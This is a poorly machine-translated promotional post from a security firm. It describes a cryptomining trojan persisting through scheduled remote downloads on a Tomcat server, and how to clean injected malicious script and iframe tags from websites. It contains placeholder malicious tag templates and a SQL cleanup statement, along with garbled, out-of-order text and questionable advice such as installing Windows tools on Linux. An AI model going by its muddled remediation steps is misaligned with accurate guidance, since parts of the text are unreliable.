The server is suspended from the mining program
a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
see when it was installed, who contacted the server, and log.
Backup the host data, and then re install the system
-
do not use the old version of the system. It is recommended that after re installing the system in 2012 or 2016
-
delete other accounts except the administrator, and then install 360 security guard to patch
-
install the server security software
< / OL >
the website hanging horse is the most troublesome problem for every website. The solutions are as follows: 1. It's easy to find the hanging horse code in the program, delete it directly, or cover the source program that you didn't transfer to the server once, but it has to be hung again and again to solve this problem. But that's not the best solution. The best way is to find a professional safety worker to help you solve the problem
listen to friends say that sinesafe is good, you can go and have a look
clear the horse + fix the loopholes = completely solve
the so-called hang horse is that hackers obtain the webmaster account through various means, including SQL injection, website sensitive file scanning, server Vulnerability, website program 0day, etc., then log in to the website background, and obtain a webshell through database backup / recovery or upload vulnerability. Use the webshell to modify the content of the web page and add malicious code to the page. You can also get the server or website FTP directly through the weak password, and then modify the website page directly. When you visit the page that has been added with malicious code, you will automatically visit the address that has been turned to or download the Trojan horse virus
clear the horse
1. Find the tag of hanging horse, such as & lt; script language=" javascript" src=" Internet horse address & quot& gt;& lt;/ script> Or & lt; Iframe width = 420 height = 330 frameBorder = 0
scrolling = auto SRC = Internet address & gt& lt;/ iframe>, Or you use 360 or anti-virus software to block the webhorse website. SQL database is linked, generally JS linked
2. After the malicious code is found, the next step is to clear the horse. If the web page is mounted, you can clear it manually or in batches. Web page cleaning is relatively simple. I won't talk about it in detail here. Now I will focus on SQL database cleaning, using the sentence "update table name, set field name = replace (field name, &# 39; aaa',&# 39;&# 39;)”, Explain the meaning of this sentence: replace the content in the field name that contains AAA with empty, so that you can delete the nethorse one by one
in the case of no backup of your website program or database, you can implement the above two steps to clear the horse. If your website program has a backup, you can directly cover the original file
fix the vulnerability (to fix the vulnerability of the website is to do the website security.)
1. Modify the user name and password of the website background and the default path of the background
2. Change the database name. If it's access database, it's better to change the file name extension to ASP instead of MDB. The file name can also have several special symbols
3. Then check whether there are injection or cross site vulnerabilities in the website. If there are any, it is equivalent to applying anti injection or anti cross site patches
4. Check the upload files of the website. If there are common cheating upload vulnerabilities, filter the corresponding code
5. Try not to expose the background address of the website, so as not to be guessed by social engineering
6. Write some anti horse code to make the frame code invalid
7. Disable FSO permission is also an absolute method
8. Modify the read / write permissions of some web site folders
9. If you are your own server, it is necessary not only to secure your website program, but also to secure your server
it is a common phenomenon that websites are hanged, but it is also a serious problem for every website operator
have you ever wanted to give up because of the daily intrusion of websites and servers? Have you delayed the operation of the website because you don't know much about the website technology? Do you feel as if you are impatient because the well-run website is repeatedly invaded by some boring hackers. Conditional suggestions to find a professional website security sine security to do security maintenance